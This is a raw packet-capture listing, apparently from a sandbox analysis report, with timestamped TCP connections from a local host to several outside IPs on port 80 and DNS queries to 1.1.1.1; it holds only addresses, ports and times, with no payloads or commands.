                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.861763000 CET5003080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.877005100 CET5003080192.168.2.554.244.188.177
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.881838083 CET805003054.244.188.177192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.043193102 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.048048973 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.048110008 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.058069944 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.058069944 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.065453053 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:45.065469027 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.478861094 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.479394913 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.479473114 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.486506939 CET5003180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.493422031 CET805003118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.706118107 CET5003280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.711297035 CET805003218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.711379051 CET5003280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.735423088 CET5003280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.735472918 CET5003280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.740331888 CET805003218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.740344048 CET805003218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.183767080 CET805003218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.184092999 CET805003218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.184151888 CET5003280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.204732895 CET5003280192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.213430882 CET805003218.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.503664970 CET5003380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.508722067 CET805003344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.508809090 CET5003380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.531138897 CET5003380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.531205893 CET5003380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.536185980 CET805003344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.536204100 CET805003344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.989826918 CET805003344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.989852905 CET805003344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.989913940 CET5003380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.025580883 CET5003380192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.030960083 CET805003344.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.276767969 CET5003480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.285017967 CET805003418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.285108089 CET5003480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.304819107 CET5003480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.304852009 CET5003480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.310503960 CET805003418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.310596943 CET805003418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.216864109 CET805003418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.216918945 CET805003418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.217014074 CET5003480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.225070953 CET5003480192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.236712933 CET805003418.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.238343000 CET5003680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.259713888 CET805003618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.259854078 CET5003680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.260186911 CET5003680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.260308027 CET5003680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.276966095 CET805003618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.277015924 CET805003618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.780299902 CET805003618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.780915976 CET805003618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.780985117 CET5003680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.793013096 CET5003680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.802444935 CET805003618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.139532089 CET5003780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.146330118 CET805003713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.146414042 CET5003780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.156621933 CET5003780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.156639099 CET5003780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.161623001 CET805003713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:52.161684036 CET805003713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.586220980 CET805003713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.588800907 CET805003713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.588901997 CET5003780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.589786053 CET5003780192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.596504927 CET805003713.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.682188988 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.697607040 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701150894 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701181889 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.701215982 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.709245920 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.709284067 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123192072 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123286963 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123352051 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.123450994 CET5003880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.128504038 CET805003813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.035049915 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.044502974 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.044605017 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057140112 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.057321072 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.065728903 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:56.065746069 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519124985 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519175053 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519223928 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519310951 CET5004080192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.527396917 CET805004047.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.538759947 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544015884 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544109106 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544234037 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.544248104 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.549474001 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.549515009 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959669113 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959695101 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.959781885 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.965012074 CET5004180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:58.969974041 CET805004113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.972806931 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.978118896 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.978202105 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.979625940 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.979665995 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.984555006 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:59.984652996 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453226089 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453301907 CET80500433.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.453392029 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.471127033 CET5004380192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:27:00.479581118 CET80500433.94.10.34192.168.2.5

                                                                                                                                                                                                                                                                                                                                UDP Packets

                                                                                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.477576017 CET5393653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:33.522897005 CET53539361.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:43.545243979 CET5185553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:43.640542984 CET53518551.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.208996058 CET5047253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:48.215889931 CET53504721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:50.651407003 CET5297253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:50.659183025 CET53529721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:52.620714903 CET5215253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:52.628086090 CET53521521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:52.810729980 CET6057253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:52.817698956 CET53605721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:53.747785091 CET5129853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:54.649233103 CET53512981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:57.102452993 CET5067353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:57.109997034 CET53506731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:57.177822113 CET5249953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:57.185988903 CET53524991.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.883996964 CET5141553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.894267082 CET53514151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.895046949 CET5471953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.904814959 CET53547191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.905577898 CET5010453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:24:59.914540052 CET53501041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:00.228188992 CET6054853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:00.239851952 CET53605481.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:06.892848969 CET6315353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:06.902735949 CET53631531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:10.747090101 CET5833353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:10.755197048 CET53583331.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:12.798336029 CET6364553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:12.809564114 CET53636451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.672034979 CET5630553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:14.680293083 CET53563051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.402425051 CET5074753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:15.410506964 CET53507471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.125350952 CET5159053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.133481026 CET53515901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.134094000 CET6354053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:17.144624949 CET53635401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:19.944242001 CET6534553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:19.954693079 CET53653451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.054507971 CET5897553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:22.064729929 CET53589751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.378278017 CET5194153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:24.385643005 CET53519411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.707298994 CET6293453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:25.716018915 CET53629341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.514301062 CET5115653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:26.521717072 CET53511561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.870697975 CET6199853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.878885984 CET53619981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.879440069 CET6092853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:27.886940002 CET53609281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.374777079 CET5059853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.384037971 CET53505981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.384620905 CET5499953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.394486904 CET53549991.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.398205996 CET5432453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:29.408608913 CET53543241.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:40.837394953 CET5849653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:25:40.844724894 CET53584961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.304610968 CET5724753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:24.315839052 CET53572471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.060353994 CET4992053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:26.067043066 CET53499201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.984584093 CET6500453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:27.994062901 CET53650041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.532308102 CET6538253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:28.633322001 CET53653821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.671891928 CET5670353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:30.678826094 CET53567031.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:31.856612921 CET5972553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:31.954221964 CET53597251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.967144012 CET5791953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:32.976177931 CET53579191.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.598371983 CET6312853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:33.607088089 CET53631281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.411340952 CET6376953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:34.418792963 CET53637691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.116193056 CET5839053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.123739004 CET53583901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.761923075 CET5182553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:36.768996000 CET53518251.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.744673014 CET5851853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:37.761341095 CET53585181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.787779093 CET6244153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:38.798327923 CET53624411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.487988949 CET6058353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:39.515474081 CET53605831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.184302092 CET6347753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:41.202935934 CET53634771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.276372910 CET4926553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.293100119 CET4926553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.295517921 CET53492651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:42.306484938 CET53492651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.172590971 CET5006353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.188453913 CET53500631.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.934103966 CET5032953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:43.942035913 CET53503291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.877763033 CET4999653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:44.884773016 CET53499961.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.538969994 CET5802053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.548763990 CET53580201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.558526039 CET5802053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:46.567385912 CET53580201.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.293180943 CET5297453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:47.301455975 CET53529741.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.026285887 CET5950553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:48.034125090 CET53595051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.225636959 CET6437753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.243823051 CET53643771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.244327068 CET5273153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:50.262878895 CET53527311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.194430113 CET5029053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.214911938 CET5029053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.228357077 CET53502901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.252304077 CET53502901.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.793692112 CET5751653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.824219942 CET5751653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.989473104 CET53575161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:51.990127087 CET53575161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.622525930 CET5021653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:53.638398886 CET53502161.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.124089956 CET5444053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.131545067 CET53544401.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.893620968 CET5094453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:55.911798954 CET53509441.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.519984007 CET5333053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                Nov 20, 2024 10:26:57.530479908 CET53533301.1.1.1192.168.2.5
